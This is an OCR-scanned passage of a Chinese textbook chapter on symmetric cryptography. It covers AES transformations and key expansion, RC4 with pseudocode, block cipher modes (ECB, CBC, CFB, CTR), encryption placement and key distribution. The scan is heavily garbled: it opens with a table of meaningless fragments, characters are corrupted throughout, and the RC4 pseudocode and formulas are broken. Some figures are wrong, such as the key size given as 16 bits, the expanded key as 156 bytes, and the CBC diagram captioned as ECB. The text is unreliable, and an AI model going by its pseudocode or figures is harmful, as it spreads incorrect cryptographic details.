| 6 | 90 | ps | aB | oo | sc | Bc | ps | oa | rr | es | ss | 05 | Be |B | 45 | o 
| 7 | po | 2c | ie | sr | ca 3F | oF | oz | cr | ar | Bp | 03 | oF | 13 | 8a | 
[s [safo | u |a | ar | 67 | oc | ea | 97 | r2 | cr | ce | ro | Ba | eo | 73 | 
| 9 | 96 | ac | m | 22 |E | ap 35 | 85 | e2 | ro | 37 | es | ic | 75 | ve | e] 
pA [a7 | ri | ia | 7 | w | 29 | cs | 89 | oF | 7 | 62 | oF | aa | 18 | BE | 1B | 
|B | Fc |se |3 | 4B | co |m | 79 | 20 | 94 | DB | co | Fe | 78 | cD | 5a | FA | 
|c |r | pp | as | 33 | se | o7 ol | Bi |12 | 10 | 59 | 27 | 80 | ec | sr] 
[o | 60 | si| | a9 | 19 | Bs | 4a | op | 20 | es | 7 | o | 93 | co | oc] EF | 
|E | ao | co | 3B | 4p | ak | 2a | Fs | Bo | ce | ep | Bp | 3c | 83 | 53 | 99 | ot | 
|r |v | 2p | 04 | ve | Ba 77 | vo | 26 | et |6 | 14 | 63 | 55 | 20 | oc | 70 | 


下 面 是 一 个 SubBytes 的 例子 : 











S 盒 的 构造 利用 了 有 限 域 的 性 质 ， 有 限 域 的 内 容 超 出 了 本 书 的 范围 ， 在 [STAL06a] PAE 
相关 的 详细 介绍 。 

逆 字 节 代 换 变换 (InvSubBytes) 利用 了 表 20-2b 所 示 的 逆 S 盒 。 例 如 输入 {2A} 到 逆 SA 
中 ， 输 出 为 {95}; 输入 {95} BIS 盒 中 ， 输 出 为 {2A}。 

S 盒 的 设计 是 用 来 抵御 所 谓 的 密码 分 析 攻 击 的 。 特 别 是 ，AES 的 开发 者 试图 设计 输入 位 和 
输出 位 之 间 具 有 较 少 的 相关 性 ， 并 且 输 出 不 能 由 一 个 简单 的 输入 函数 描述 出 来 。 

行 移 位 变换 正 向 行 移 位 变换 ( ShiftRows) 中 ，State 的 第 一 行 保持 不 变 。 把 State 的 第 二 
行 循环 左 移 一 个 字 节 ， 对 于 第 三 行 循 环 左 移 两 个 字 节 ， 第 四 行 循环 左 移 三 个 字 节 。 下 面 是 行 移 
位 变换 (ShiftRows) 的 一 个 例子 : 











逆行 移 位 变换 (InvShiftRows) 将 后 三 行 执行 相反 方向 的 移 位 操作 ， 如 第 二 行 向 右 循环 一 
个 字 节 ， 等 等 。 

行 移 位 要 比 它 看 起 来 有 用 得 多 。 这 是 因为 State 和 密码 算法 的 输入 输出 一 样 ， 是 一 个 4 字 
节 列 所 组 成 的 数组 。 因 此 在 加 密 过 程 中 ， 明 文 的 前 四 个 字 节 直接 被 复制 到 State 的 第 一 列 中 ， 
等 等 。 进 一 步 而 言 ， 如 下 面 将 要 看 到 的 那样 ， 轮 密 钥 也 是 逐 列 地 应 用 到 State 上 的 。 因 此 ， 行 
移 位 就 是 将 某 个 字 节 从 一 列 移动 到 另 一 列 中 ， 它 的 线性 距离 是 4 字 节 的 倍数 。 同 时 请 注意 这 个 
变换 确保 了 某 列 中 的 4 字 节 被 扩展 到 4 个 不 同 的 列 。 

列 混淆 变换 正 向 列 混淆 变换 (MixColumns) 对 每 列 进行 独立 的 操作 。 每 列 中 的 每 个 字 节 
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被 映射 成 为 一 个 新 值 ， 此 值 是 该 列 中 所 有 4 字 节 值 的 函数 。 该 映射 使 用 了 有 限 域 上 的 方程 ， 下 
面 是 一 个 列 混淆 的 例子 。 





该 映射 被 用 来 为 每 列 的 字 节 值 提供 好 的 混淆 。 列 混淆 和 行 移 位 一 起 确保 了 经 过 几 轮 后 ， 所 
有 的 输出 位 都 依赖 于 所 有 的 输入 位 。 

轮 密 钥 加 变换 正 向 轮 密 钥 加 变换 (AddRoundKey) 中 ，128 位 的 State 按 位 与 128 位 的 轮 
密 钥 进行 异 或 操作 。 我 们 把 这 个 操作 看 成 是 基于 State 的 一 列 中 的 四 个 字 节 与 轮 密 钥 的 一 个 字 
的 列 级 别 (column-level) 操作 ; 我 们 也 能 将 其 视 为 字 节 级 别 (byte-level) 的 操作 。 下 面 是 轮 密 
钥 加 的 一 个 例子 : 





第 一 个 矩阵 是 State， 第 二 个 矩阵 是 轮 密 钥 。 

逆向 轮 密 钥 加 变换 与 正 向 轮 密 钥 加 变换 相同 ， 因 为 XOR ( 异 或 ) 操作 是 其 本 身 的 逆 。 

轮 密 钥 加 变换 非常 简单 ， 却 能 影响 State 中 的 每 一 位 。 密 钥 扩 展 的 复杂 性 和 AES 其 他 阶段 
运算 的 复杂 性 ， 确 保 了 该 算法 的 安全 性 。 

AES 密 钥 扩展 AES 密 钥 扩展 算法 输入 值 是 4 字 (16 位 ) 密 钥 ， 输 出 值 是 一 个 44 字 
(156 字 节 ) 的 一 组 线性 数组 。 这 足以 为 初始 轮 密 钥 加 阶段 和 算法 中 的 其 他 10 轮 中 的 每 一 轮 提 
供 4 字 的 轮 密 钥 。 

密 钥 直接 复制 到 扩展 密 钥 的 前 四 个 字 。 然 后 每 次 用 四 个 字 填 充 扩展 密 钥 数 组 的 其 他 部 分 。 
在 扩展 的 密 钥 数组 中 ，w[i] 的 值 依赖 于 w[i-1] 和 w[i-4]。 更 复杂 的 有 限 域 算法 用 来 产生 扩展 的 
密 钥 。 


20.4 流 密码 和 RC4 


分 组 密码 一 次 处 理 输 入 的 一 组 元 素 ， 每 组 输入 产生 一 组 输出 。 流 密码 持续 地 处 理 输入 元 
素 ， 随 着 处 理 的 继续 ， 每 次 产生 一 组 输出 。 尽 管 分 组 密码 已 非常 普遍 ， 但 是 某 些 基于 流 密 码 的 
应 用 也 是 很 受 欢迎 的 。 本 章 的 后 面 我 们 将 给 出 例子 。 本 节 我 们 讨论 一 种 可 能 是 最 流行 的 对 称 流 
密码 一 一 RC4。 首 先 介 绍 流 密码 的 结构 ， 然 后 探讨 RC4。 


20.4.1 流 密码 的 结构 


一 个 典型 的 流 密 码 每 次 加 密 一 字 节 的 明文 。 当 然 流 密码 也 可 以 被 设计 为 每 次 操作 一 位 或 者 
大 于 一 个 字 节 的 单元 。 图 2-3b 给 出 了 一 个 典型 的 流 密码 的 结构 。 在 该 结构 中 ， 密 钥 输 入 到 一 
个 伪 随 机 数 发 生 器 ， 该 伪 随 机 数 发 生 器 产生 一 串 随机 的 8 位 数 。 伪 随机 流 就 是 在 不 知道 输入 密 
钥 的 情况 下 不 可 预知 的 流 ， 并 且 具 有 表面 上 的 随机 特征 。 发 生 器 的 输出 称 为 密 钥 流 ， 通 过 与 同 
一 时 刻 一 个 字 节 的 明文 流 进 行 异 或 (XOR) 操作 产生 密 钥 流 。 例 如 ， 如 果 发 生 器 产生 的 下 一 字 
节 为 01101100， 而 下 一 明文 字 节 为 11001100， 则 得 出 密 文字 节 为 : 
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11001100 Ax 
®© 01101100 密 钥 流 
10100000 #x 
解密 需要 使 用 相同 的 伪 随 机 序列 : 
10100000 $X 
® 01101100 密 钥 流 
11001100 ”明文 
通过 设计 合适 的 人 擅 随 机 数 发 生 器 ， 流 密码 可 以 提供 和 相应 密 钥 长 度 相当 的 安全 性 。 流 密码 
的 主要 优点 是 ， 其 相对 于 分 组 密码 来 说 ， 往 往 速度 更 快 而 且 需 要 编写 的 代码 更 少 。 例 如 本 节 介 
绍 的 RC4， 仅仅 几 行 代码 就 可 实现 。 表 20-3 列 出 了 RC4 与 三 种 常见 的 对 称 分 组 密码 执行 速度 
的 比较 。 分 组 密码 的 优点 是 可 以 重复 使 用 密 钥 。 然 而 ， 如 果 用 流 密码 对 两 个 明文 加 密使 用 相同 
的 密 钥 ， 则 密码 分 析 就 会 相当 容易 [DAWS96]。 如 果 对 两 个 密 文 流 进行 异 或 ， 得 出 的 结果 就 是 
两 个 原始 明文 的 异 或 。 如 果 明 文 仅仅 是 文本 串 ， 如 信用 卡号 或 者 其 他 已 知 特征 的 字 节 流 ， 则 密 
码 分 析 极 易 获得 成 功 。 


表 20-3 ”奔腾 4 上 对 称 密码 的 速度 对 比 





来 源 : http://www.cryptopp.com/benchmarks.html 


对 于 需要 对 数据 流 加 解密 的 应 用 ， 比 如 一 个 数据 通信 信道 或 者 网 页 浏览 器 /Web 链 路 ， 流 
密码 就 是 很 好 的 解决 方案 。 而 对 于 处 理 成 块 的 数据 ， 比 如 文件 传输 、 电 子 邮 件 和 数据 库 ， 分 组 
密码 则 更 为 适用 。 当 然 ， 在 实际 中 两 种 类 型 的 密码 都 可 用 于 几乎 所 有 的 应 用 。 


20.4.2 RC4 算法 


RC4 是 RonRiver 47 RSA 公司 在 1987 年 设计 的 一 种 流 密码 。 它 是 一 个 可 变 密 码 长 度 
(variable-key-size)、 面 向 字 节 (byte-oriented) 操作 的 流 密 码 。 该 算法 以 随机 置换 为 基础 。 分 
析 显 示 该 密码 的 周期 完全 可 能 大 于 [ROBS95a]。 每 输出 一 个 字 节 的 结果 仅 需 要 8 ~ 16 条 机 器 
操作 指令 ， 并 且 密 码 在 软件 中 运行 速度 非常 快 。RC4 被 用 于 SSL/TLS ( Secure Sockests Layer/ 
Transport Layer Security， 安 全 套 接 字 层 /传输 层 协议 ) 标准 ， 该 标准 是 为 网 络 浏览 器 和 服务 
器 间 通 信和 而 制定 的 。 它 也 应 用 于 作为 EEE802.11 无 线 局 域 网 标准 的 一 部 分 的 WEP ( Wired 
Equivalent Privacy, 有 限 等 效 隐 私 ) 协议 和 更 新 的 WiFi 保护 访问 (WiFi Protected Aceess, WPA) 
协议 。RC4 作为 RSA 公司 的 商业 机 密 并 没有 公开 。 直 到 1994 年 9 月 ， RC4 算 法 才 通过 
Crypherpinks 匿名 邮件 列表 匿名 公布 于 Internet 上 。 

RC4 算法 非常 简单 和 易于 描述 : 用 1 ~ 256 个 字 节 (8 ~ 2048 位 ) 可 变 长 度 密 钥 初 始 化 
一 个 256 个 字 节 的 状态 矢量 S, S 的 元 素 记 为 S[0], S[1], …, S[255]。 任何 时 刻 , S 包含 从 0 一 255 
的 所 有 8 位 数 。 对 于 加 密 和 和 解密， 字 节 大 (图 2-3b) H SH 255 个 元 素 按 一 定 方式 选 出 一 个 元 
素 而 生成 。 每 生成 一 个 的 值 ，S 中 的 元 素 就 被 重 置 一 次 。- 

初始 化 S 开始 时 ，S 中 元 素 的 值 被 置 为 按 升 序 从 0 ~ 255， 即 S[0]==0, S[1]51, +, 
S[255$] 一 255。 同 时 建立 一 个 临时 矢量 T。 如 果 密 钥 K 的 长 度 为 256 字 节 ， 则 K 将 赋 给 T。 否 
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则 ， 若 密 钥 长 度 为 keylen 字 节 ， 则 将 K 的 值 赋 给 T 的 前 keylen 个 元 素 ， 并 循环 重复 使 用 KK 的 
ERA TRIP HICK, HE T 的 所 有 元 素 都 被 赋值 。 这 些 操 作 可 以 概括 如 下 : 

/* Initialization */ 

for i = 0 to 255 do 

S[i] =i; 

T[i] = K[i mod keylen] ; 

然后 用 T 产 生 S 的 初始 置换 。 从 S[0] 到 S[255]， 对 每 个 Sli], MPH Ti MENT, 
将 S[i] 置换 为 $ 中 的 另 一 字 节 : 


/* Initial Permutation of S */ 

] = 0; 

for i = 0 to 255 do 
j = (j + Sli] + T[i]) mod 256; 
Swap (S[i], SI[j]); 


因为 对 S 的 操作 仅仅 是 交换 ， 所 以 唯一 的 改变 就 是 置换 ,S 仍然 包含 所 有 值 为 0 一 255 的 元 素 。 [653 
密 钥 流 的 生成 ”矢量 S 一 旦 完成 初始 化 ， 就 不 再 使 用 输入 密 钥 。 密 钥 流 的 生成 涉及 所 有 的 

元 素 S[i]。 对 每 个 S[i]， 根 据 当 前 SHA, 将 S[i] 与 s 中 另 一 个 字 节 置 换 。 当 S[255] 完成 置换 

后 ， 操 作 继续 重复 ， 从 S[0] 开始 : 


/* Stream Generation */ 
i, j = 0; 


while (true) 
i = (i + 1) mod 256; 
j = (j + S[i]) mod 256; 


Swap (S[i], SI[j]); 
t = (SIil + S[j]) mod 256; 
= S(t]; 


在 加 密 中 ,将 k 的 值 与 下 一 明文 字 节 异 或 ; 在 解密 中 , 将 k 的 值 与 下 一 密 文字 节 异 或 。 
图 20-5 总 结 了 RC4 的 逻辑 结构 。 


s [ola T21314] a psaisaass 


< 一 #AKE 一 > 























a) S 和 T 的 初始 化 状态 
j=j + Sti] + Tli] 
s EEEL … - CE 
b) S 的 初始 置换 
j=j+S0] 
s EPELE … … 国 … (SE 
— i mcc 交换 
t = S[i] + S[j] 
c) FARKE 


图 20-5 RC4 
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RC4 的 强度 ”分析 RC4 的 攻击 方法 有 许多 公开 发 表 的 文献 ， 但 没有 哪 种 方法 对 于 攻击 有 


[654] 足够 长 度 密 钥 (如 128 位 ) 的 RC4 有 效 。 值 得 注意 的 是 [FLUH01] 中 的 报告 。 作 者 指出 用 于 为 


802.11 无 线 局 域 网 提供 机 密 性 的 WEP 协议 ， 易 于 受到 一 种 特殊 的 攻击 方法 的 攻击 。 从 本 质 上 
讲 ， 这 个 问题 并 不 在 于 RC4 本 身 ， 而 是 作为 RC4 中 输入 的 密 钥 产生 的 漏洞 。 这 种 特殊 的 攻击 
方法 不 适用 于 其 他 使 用 RC4 的 应 用 ， 通 过 修改 WEP 中 密 钥 产生 的 途径 可 以 避免 这 种 攻击 。 这 
个 问题 恰好 说 明了 设计 一 个 安全 的 系统 的 困难 性 不 仅 包括 密码 编码 函数 ， 还 包括 协议 如 何 正 确 
地 使 用 这 些 密码 编码 函数 。 


20.5 ”分 组 密码 的 工作 模式 


对 称 分 组 密码 一 次 处 理 一 个 数据 分 组 。 在 DES 和 3DES 中 ， 分 组 的 长 度 为 64 位 。 对 于 更 
长 的 明文 ， 有 必要 将 明文 分 成 64 位 的 分 组 (padding the last block if necessary)。 为 了 将 分 组 密 
码 应 用 于 实际 中 ，NIST (特别 公布 800-38A) 中 定义 了 5 种 操作 模式 。 这 些 模式 覆盖 了 几乎 所 
有 的 使 用 分 组 密码 的 应 用 程序 。 可 用 于 包括 3DES 和 AES 在 内 的 任何 分 组 密码 。 表 20-4 对 这 
些 模型 做 了 一 个 总 结 ， 后 面 章节 会 简单 描述 这 个 模型 。 ; 
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CE Awan 


电码 本 (ECB) 用 相同 的 密 钥 分 别 对 64 位 的 明文 组 加 密 ere ee 
加 密 算法 的 输入 是 上 一 个 64 位 的 密 文 组 和 下 | 。 普 通 目的 的 面向 分 组 的 传输 
密码 分 组 链接 (CBC) 一 个 64 位 的 明文 组 异 或 。 认 证 


一 次 处 理 位 。 上 一 个 分 组 密 文 作为 产生 一 个 


密码 反馈 (CFB) 伪 随 机 数 输出 的 加 密 算法 的 输入 ， 该 输出 与 明 | e a 
文 异 或 ， 作 为 下 一 个 分 组 的 输入 


与 CFB 基本 相同 ， 只 是 加 密 算法 的 输入 是 上 |。 噪声 通道 上 的 数据 流 的 传输 (如 卫 
输出 反馈 (OFB) 一 次 DES 的 输出 星 通信 ) 
sie eas 每 个 明文 组 是 与 加 密 的 计数 器 的 异 或 。 对 每 | 。 普 通 的 面向 分 组 的 传输 
个 后 续 的 组 ， 计 数 器 是 增加 的 。 用 于 高 速 需求 
20.5.1 电码 本 模式 


最 简单 的 模式 是 电码 本 模式 ， 它 一 次 处 理 b 位 明文 。 每 次 使 用 相同 的 密 钥 加 密 (图 2-3a)。 
使 用 电码 本 这 个 词 是 因为 对 于 给 定 的 密 钥 ,任何 5 位 的 明文 组 只 有 唯一 的 密 文 与 之 对 应 ， 所 以 
可 以 想象 存在 一 个 很 厚 的 密码 本 ,根据 任意 b 位 明文 都 可 以 查 到 相应 的 密 文 。 

在 ECB 中 ， 如 果 一 个 明文 中 相同 的 5 位 分 组 在 消息 这 种 出 现 了 不 止 一 次 ， 那么 它 将 会 产 
生 相 同 的 密 文 。 由 于 这 个 原因 ， 对 于 比较 长 的 消息 ，ECB 模式 可 能 是 不 安全 的 。 如 果 消 息 是 
高 度 结构 化 的 ， 那 么 密码 分 析 者 就 能 发 现 这些 规 律 。 例 如 ， 若 已 知 这 段 消 息 总 是 以 某 些 固定 的 
字符 开头 ， 密 码 分 析 者 就 可 以 拥有 大 量 的 明 密 文 对 以 展开 攻击 。 若 消息 有 重复 的 成 分 ， 且 重复 
的 周期 正好 是 b 位 的 倍数 ， 分 析 者 就 能 辨认 出 这 些 成 分 ， 然 后 可 以 用 代 换 和 重 排 这 些 分 组 的 方 
法 进行 攻击 。 

为 了 克服 ECB 这 些 弱 点 ,我 们 需要 一 种 技术 将 重复 的 明文 组 加 密 成 不 同 的 密 文 组 。 


20.5.2 ”密码 分 组 链接 模式 
在 密码 分 组 链接 (CBC) 模式 下 〈 见 图 20-6 )， 加 密 算 法 的 输入 是 当前 明文 组 和 上 一 个 密 文 
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组 的 异 或 (XOR)， 而 使 用 的 密 钥 相 同 。 这 就 相当 于 将 所 有 的 明文 组 链接 起 来 了 。 加 密 算法 的 
每 次 输入 与 本 明文 组 没有 固定 的 关系 。 因 此 ， 车 有 重复 的 5 位 明文 组 ， 加 密 后 就 看 不 出 来 了 。 


时 间 =1 时 间 =2 时 间 =N 
Iw P, P, P 


N 





P, P, P 
b) 解密 
图 20-6 ”电码 本 (ECB) 模式 
解密 时 ， 每 个 密码 分 组 通过 解密 算法 分 别 进 行 解密 ， 再 与 上 一 块 密 文 异 或 可 恢复 出 明文 。 
下 面 对 这 个 过 程 的 正确 性 给 出 证 明 : 
C=E(K, [C- © Pi) 
这 里 ELK, X) 表示 利用 密 钥 天 AX I, Oza HERE, N 
D(K, G)=D\K, E(K, [C- ® P) 
D(K, C)=C-1 © P; 
C- ® DK, G)=C-1 © Ga © PSP; 

以 上 验证 了 图 20-6b。 

为 了 产生 第 一 个 密 文 块 ， 一 个 初始 矢量 CIV) 和 第 一 个 明文 块 异 或 。 解 密 时 ， 将 第 一 块 密 
文 解密 的 结果 与 IV 异 或 而 恢复 出 第 一 块 明文 。 

丸 必 须 收 发 双方 共享 。 为 了 增加 安全 性 ， 和 密 钥 一 样 应 该 对 亚 加 以 保护 。 比 如 用 ECB 
MRRP IV. BRP 灰 的 一 个 原因 是 ， 攻 击 者 可 以 欺骗 接收 者 ， 让 他 使 用 不 同 的 IV， 然后 
将 第 一 个 明文 组 的 某 些 位 取 反 。 为 了 解 这 一 点 ， 考 虑 如 下 的 要 求 ， 

C\=E(K, [1 由 局]) 
P=1V ©@ D(K, CU 
MEH Xj] em DMA XH. WA: 
P\[i]=IV[i] ® DK, CY 
使 用 XOR 的 性 质 ， 我 们 可 以 写 为 ; 
P,[i]'=IV[i]' ® DK, CD 
撤 号 表示 取 反 。 这 意味 着 攻击 者 可 以 预先 改变 JV 中 某 些 位 ， 从 而 接收 者 收 到 的 PI 相应 也 就 改 
变 了 。 


20.5.3 ”密码 反馈 模式 
利用 密码 反馈 模式 (CFB) 可 以 将 任意 分 组 密码 转换 成 流 密码 。 流 密码 不 需要 明文 长 度 是 
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分 组 长 度 的 整数 倍 ， 且 可 以 实时 操作 。 所 以 ， 待 发 送 的 字符 流 中 任何 一 个 字符 都 可 以 用 面向 字 
符 的 流 密码 加 密 后 立即 发 送 。 
657 流 密码 一 个 让 人 心动 的 性 质 是 ， 密 文 与 明文 等 长 。 所 以 ， 如 果 要 发 送 8 位 的 字符 ， 加 密 时 
也 是 用 8 位 。 如 果 多 于 8 位 ， 传 输 能 力 就 浪费 了 。 
图 20-7 描述 了 CFB 模式 ， 图 中 ， 假 设 传输 单元 是 位 ，* 通 常 为 8。 如 果 用 CBC 模式 ， 
明文 的 各 个 单元 要 链接 起 来 ， 所 以 任意 一 个 明文 单元 的 密 文 都 是 前 面 所 有 明文 的 函数 。 





b) 解密 


”图 20-7 s 位 密码 反馈 (CFB) 模式 


首先 来 考虑 加 密 。 加 密 的 输入 是 4b 位 的 移 位 寄存 器 ， 它 的 值 为 初始 矢量 IVY。 加 密 函 数 最 
左边 的 s 位 与 明文 Pi 异 或 得 到 第 一 个 密 文 单元 Cl。 然 后 将 Ci 发 送出 去 。 接 着 ， 移 位 寄存 器 左 
移 s 位 ，C' 填 入 移 位 寄存 器 的 最 左边 s 位。 就 这 样 ， 直 到 所 有 明文 单元 加 密 完成 。 
解密 使 用 相同 的 方法 ， 不 同 之 处 是 将 收 到 的 密 文 单元 与 加 密 函 数 的 输出 异 或 得 到 明文 单 
658] 元。 注意 ， 这 里 使 用 的 是 加 密 函 数 而 非 解密 函数 ， 这 一 点 很 容易 理解 。 设 S,(X) 表示 天 的 最 左 
Ast, WA 
C\=P, ® S(E(K, IV)) 
从 而 有 
P\=C, ® SJE(K, IV)] 
对 后 续 单 元 亦 同 理 可 得 。 


20.5.4 
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计数 器 模式 


尽管 计数 器 模式 (CTR) 在 ATM (异步 传输 模式 ) 网 络 安全 与 IPSec (PE) 中 的 应 
用 ， 人 们 最 近 才 对 它 产生 了 浓厚 的 兴趣 ， 但 实际 上 ， 这 种 模式 很 早 就 已 经 提出 来 了 [ 例如 ， 
DIFF79]。 

图 20-8 描述 了 CTR 模式 。 计 数 器 使 用 与 明文 分 组 规模 相同 的 长 度 。SP 800-38A 的 唯一 要 
求 是 加 密 不 同 的 明文 组 计数 器 对 应 的 值 必须 是 不 同 的 。 典 型 地 ， 计 数 器 首先 被 初始 化 为 某 一 
值 ， 然 后 随 着 消息 块 ( 模 2*， 其 中 45 为 分 组 大 小 ) 的 增加 计数 器 的 值 加 1。 计数 器 加 1 后 与 明 
文 组 异 或 得 到 密 文 组。 解密 使 用 具有 相同 值 的 计数 器 序列 ， 用 加 密 后 的 计数 器 的 值 与 密 文 组 异 
或 来 恢复 相应 的 明文 组 。 


计数 器 计数 器 +N-1 





图 20-8 计数 器 (CTR) 模式 


文献 [LIPM00] 列 出 了 计数 器 模式 (CTR) 的 如 下 优点 : 


硬件 效率 (hardware efficiency) : 与 三 种 链接 模式 不 同 ，CTR 模式 能 够 并 行 处 理 多 块 明 
X (EX) 的 加 密 (解密 )。 链 接 模式 在 处 理 下 一 块 数据 前 必须 完成 当前 数据 块 的 计算 ， 
这 就 限制 了 算法 的 吞吐 量 。 在 CTR 模式 中 ， 吞吐 量 仅 受 可 使 用 并 行 数量 的 限制 。 

软件 效率 (software efficiency): 类 似 地 ， 因 为 CTR 模式 能 够 进行 并 行 计算 ， 所 以 处 
理 器 能 够 很 好 地 用 来 提供 像 流水 线 、 每 个 时 钟 周期 的 多 指令 分 派 、 大 数量 的 寄存 器 和 
SIMD 指令 等 并 行 特征 。 

MALI (preprocessing): 基本 加 密 算法 的 执行 并 不 依靠 明文 或 密 文 的 输入 。 因 此 ， 如 
果 有 充足 的 存储 器 可 用 且 能 够 提供 安全 ， 预 处 理 器 能 够 准备 如 图 20-8 所 示 的 用 于 XOR 
的 函数 的 加 密 盒 的 输出 。 当 给 出 明文 或 密 文 时 ， 所 需 的 计算 仅 是 进行 一 系列 的 异 或 。 
这 样 的 策略 能 够 极 大 地 提高 吞吐 量 。 

随机 访问 (random access): 密 钥 的 第 i 个 明文 组 能 够 用 一 种 随机 访问 的 方式 处 理 。 在 
链接 模式 下 ， 前 面 的 il 块 密 文 计算 出 来 后 才能 计算 密 文 CC。 有 很 多 应 用 情况 是 全 部 
密 文 已 存储 好 了 ， 只 需要 破解 其 中 某 一 块 密 文 。 对 于 这 种 情形 ， 随 机 访问 的 方式 很 有 
吸引 力 。 

可 证 明 安 全 性 (provable security): 能 够 证 明 CTR 模式 至 少 和 本 节 讨 论 的 其 他 模式 一 样 
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安全 。 

e 简单 性 (simplicity): 与 ECB 和 CBC 不 同 ，CTR 模式 要 求实 现 加 密 算法 ， 但 不 要 求实 
现 解 密 算法 。 像 高 级 加 密 标准 一 样 ， 当 加 密 算法 与 解密 算法 本 质 上 不 同时 ， 就 更 能 体 
现 这 种 模式 的 简单 性 。 另 外 ， 也 不 用 实现 解密 密 钥 扩展 。 


20.6 ”对 称 加 密 设备 的 位 置 


加 密 是 应 对 网 络 安全 威胁 的 最 有 利和 最 常见 的 方法 。 使 用 加 密 ， 我 们 需要 搞 清楚 的 是 ， 加 
密 什么 ? 在 什么 地 方 可 以 加 密 ? 有 两 种 基本 的 选择 : 链 路 加 密 和 端 对 端的 加 密 。 图 20-9 给 出 
了 分 组 交换 网 上 的 加 密 。 





@ -sammma 
() = 链 路 加 密 设备 
FRN = 帧 中 继 结 点 


图 20-9 分 组 交换 网 上 的 加 密 


使 用 链 路 加 密 ， 是 在 通信 和 链 路 两 端 加 上 加 密 设备 。 这 样 ， 链 路 上 所 有 信息 传输 都 是 安全 
的 。 尽 管 这 种 方法 对 于 一 个 很 大 的 网 络 来 说 需要 很 多 加 密 设备 ,但 其 作用 是 显而易见 的 。 它 的 
缺点 是 ， 每 次 分 组 交换 都 需要 将 消息 解密 。 因 为 交换 时 要 用 到 数据 包头 地 址 ， 以 便 寻 径 。 所 以 
在 每 次 分 组 交换 时 ， 消 息 是 易 受 攻击 的 。 如 果 是 公众 分 组 交换 网 ， 用 户 对 结 点 的 安全 性 不 能 
控制 。 

使 用 端 对 端的 加 密 ， 加 密 过 程 在 两 端 系统 中 进行 。 由 源 主机 或 终端 加 密 数 据 。 加 密 的 数据 
( 密 文 ) 经 由 网 络 传送 到 目的 主机 或 终端 。 目 的 主机 与 源 主机 共享 一 个 密 钥 以 便 解 密 。 这 种 方 
法 看 起 来 可 以 使 网 络 连接 和 交换 的 信息 传输 安全 。 然 而 ， 这 种 方法 依然 存在 弱点 。 

看 看 这 种 情况 。 一 个 主机 通过 分 组 交换 网 与 另 一 个 主机 建立 起 逻辑 数据 链 路 ， 并 准备 用 端 
对 端 加 密 发 送 数据 到 第 三 台 主 机 。 数 据 包含 信息 头 和 一 些 用 户 数据 。 主 机 应 加 密 每 个 数据 包 的 
哪个 部 分 呢 ? 对 整个 包 加 密 (当然 包括 信息 头 )， 那 是 不 可 行 的 ， 因 为 只 有 第 三 台 主 机 才能 解 
密 。 而 分 组 交换 结 点 接收 到 密 文 后 不 能 读 信息 头 ， 这 样 就 不 能 实现 包 的 路 由 。 现 在 假设 主机 只 
对 用 户 数据 进行 加 密 ， 信 息 头 保持 明文 。 

所 以 ， 使 用 端 对 端的 加 密 ， 用 户 数据 安全 了 。 但 是 ， 因 为 信息 头 以 明文 传输 ， 传 输 过 程 又 
不 安全 了 。 为 了 实现 更 大 的 安全 性 ， 应 同时 使 用 链 路 和 端 对 端的 加 密 ， 如 图 20-9 所 示 。 

总 之 ， 当 同时 使 用 两 种 加 密 形式 时 ， 主 机 使 用 端 对 端 加 密 密 钥 来 加 密 用 户 数据 ， 整 个 分 
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组 则 使 用 链 路 加 密 密 钥 。 分 组 在 网 络 中 穿梭 时 ， 每 个 结 点 用 链 路 加 密 密 钥 来 解密 它 ， 读 取信 息 
头 ， 然 后 加 密 整 个 分 组 ， 发 送 到 下 一 个 链 路 上 。 这 时 ， 除 了 在 分 组 交换 结 点 的 存储 器 逗留 的 时 
间 里 信息 头 是 明文 以 外 ， 整 个 分 组 一 直 都 是 安全 的 。 


20.7 BARR 


对 称 加 密 要 求 交 换 消息 双方 共享 密 钥 ， 并 且 此 密 钥 不 为 他 人 所 知 。 此 外 ， 密 钥 要 经 常 变 
动 ， 以 防 攻击 者 知道 。 因 此 ， 任 何 密码 系统 的 强度 都 与 密 钥 分 发 方法 有 关 。 密 钥 分 发 方法 是 指 
将 密码 分 发 给 希望 交换 数据 的 双方 而 不 让 别人 知道 的 方法 。 对 于 参与 者 A 和 B， 密 钥 的 分 发 
有 以 下 几 种 方法 : 

1. 密 钥 由 A 选择 ， 并 亲自 交 给 B。 

2. 第 三 方 选 择 密 钥 后 亲自 交 给 A Ñ B, 

3. 如果 A 和 了 B 以 前 或 最 近 使 用 过 某 密 钥 ， 其 他 一 方 可 以 用 它 加 密 一 个 密 钥 后 再 发 送 给 另 
一 方 。 

4.A 和 B 与 第 三 方 C 均 有 秘密 渠道 ， 则 C 可 以 将 一 密 钥 分 别 秘密 发 送 给 A AB. 

方法 1 和 2 需要 人 工 传送 密 钥 。 对 链 路 加 密 ， 这 个 要 求 并 不 过 分 。 因 为 每 个 链 路 加 密 设 
备 仅 同 链 路 另 一 方 进行 数据 交换 。 但 是 对 于 端 对 端 加 密 ， 这 样 做 未 免 有 些 笨拙 。 在 分 布 式 系统 
中 ,任何 主机 和 终端 可 能 需要 和 其 他 许多 主机 或 终端 经 常 交 换 数据 。 所 以 ,每 个 设备 需要 大 量 
动态 产生 的 密 钥 ， 特 别 是 对 于 那些 广 域 分 布 系统 。 

方法 3 可 以 用 于 链 路 加 密 ， 也 可 用 于 端 对 端的 加 密 。 但 是 ， 如 果 攻 击 者 曾经 成 功 获取 过 一 
个 密 钥 ， 则 所 有 子 密 钥 都 暴露 了 。 就 算 频 繁 更 改 链 路 层 加密 密 钥 ， 这 些 更 改 也 应 该 手工 完成 。 
为 端 到 端 加 密 提 供 密 钥 ， 方 法 4 更 可 取 。 

图 20-10 阐明 了 满足 方法 4 的 端 到 端 加 密实 现 方法 。 图 中 ， 链 路 层 加 密 被 忽略 了 ， 可 以 根 
据 需 要 添加 或 不 添加 它 。 在 这 个 方案 中 ， 定 义 了 两 种 密 钥 : 

© 会 话 密 钥 : 当 两 个 端 系统 (主机 、 终 端 ， 等 等 ) 希望 通信 时 ， 他 们 建立 一 条 逻辑 连接 

〈 例 如 ， 虚 电路 )。 在 逻辑 连接 持续 过 程 中 ， 所 有 用 户 数据 都 使 用 一 个 一 次 性 的 会 话 密 [663] 
钥 加 密 。 在 会 话 或 连接 结束 时 ， 会 话 密 钥 被 销 席 。 






1. 主 机 发 送 请 求 连接 的 数据 包 

2. 安 全 服务 将 包 缓存 并 向 KDC 请 求 会 话 密 铀 
3. KDC 给 两 个 主机 发 送 会 话 密 钥 

4. 发 送 缓 存 的 数据 包 


图 20-10 面向 连接 协议 的 自动 密 钥 分 发 
